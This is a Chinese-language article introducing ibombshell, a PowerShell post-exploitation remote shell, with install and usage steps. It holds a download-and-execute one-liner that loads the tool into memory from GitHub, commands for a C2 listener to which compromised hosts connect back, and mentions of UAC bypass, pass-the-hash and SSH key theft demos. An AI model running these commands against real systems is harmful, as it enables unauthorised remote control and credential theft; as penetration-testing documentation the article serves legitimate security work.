今天给大家介绍的是一款名叫 ibombshell 的动态远程 Shell 工具, 该工具基于 Powershell 开发, 可在后渗透利用阶段发挥其作用.
ibombshell 介绍
ibombshell 本身是一个 shell, 但是它能够直接下载进目标设备的内存中, 并给研究人员提供大量的渗透测试功能, 这些功能是直接加载进内存的, 并以 Powershell 函数的形式提供给测试人员, 也就是说, 这些功能 "走到哪里" 都能够直接执行.
除此之外, ibombshell 还提供了一种名叫 Silently 的二级执行模式, 所以渗透测试人员可以执行一个 ibombshell 实例 (名叫 warrior), 被入侵的主机将会通过 HTTP 链接到一个 C2 控制面板, 因此测试人员就可以通过控制 warrior 来实现对目标主机的渗透.
工具要求
为了发挥 ibombshell 的完整功能, 首先要求的是 Powershell 3.0 及以上版本, 如果你用的不是 Windows, 你可以阅读这篇 [ 文章 https://github.com/PowerShell/PowerShell ] 来实现在任意系统上使用 Powershell.
如果你想以 Silently 模式运行 ibombshell, 你还需要 Python 3.6 以及其他的一些 Python 库, 安装命令如下:
- cd ibombshell\ c2/
- pip install -r requirements.txt
工具使用
ibombshell 主要有两种执行模式:
第一种名叫 "ibombshell everywhere" 模式, 你可以直接在 Powershell 上加载 ibombshell:
iex (new-objectnet.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')
然后运行下载下来的 ibombshell 控制台:
console
第二种名叫 "ibombshell silently" 模式, 当前版本允许我们运行 ibombshell 控制台并通过 C2 控制面板来实现远程访问. 首先你需要在 Powershell 中启动控制台进程:
iex (new-objectnet.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')
设置好 ibombshell 的 C2 路径:
python3 ibombshell.py
创建一个监听器, 并与 warrior 相连:
- iBombShell>load modules/listener.py
- [+]Loading module...
- [+]Module loaded!
- iBombShell[modules/listener.py]>run
默认的监听端口为 8080, 然后在主机上以 Silently 模式启动控制台, 并获取到远程控制权限:
console-Silently -uriConsole http://[ip or domain]:[port]
ibombshell C2 机制
ibombshell 控制面板的基本运行机制如下图所示:
Docker
我们还为用户提供了专门的 Docker 容器, 你可以使用下列命令来使用它:
- sudo docker build -t "ibombshell" .
- sudo docker run -it ibombshell
工具使用演示
iBombShell:PoC Warrior + Bypass UAC + Pass the hash
iBombShell:macOS
ibombshell:Extracting Private SSH Keys on Windows 10
iBombShell:PoC savefunctions
许可证协议
本项目遵循 GNU 许可证协议.
来源: http://www.tuicool.com/articles/MvmiQ3Z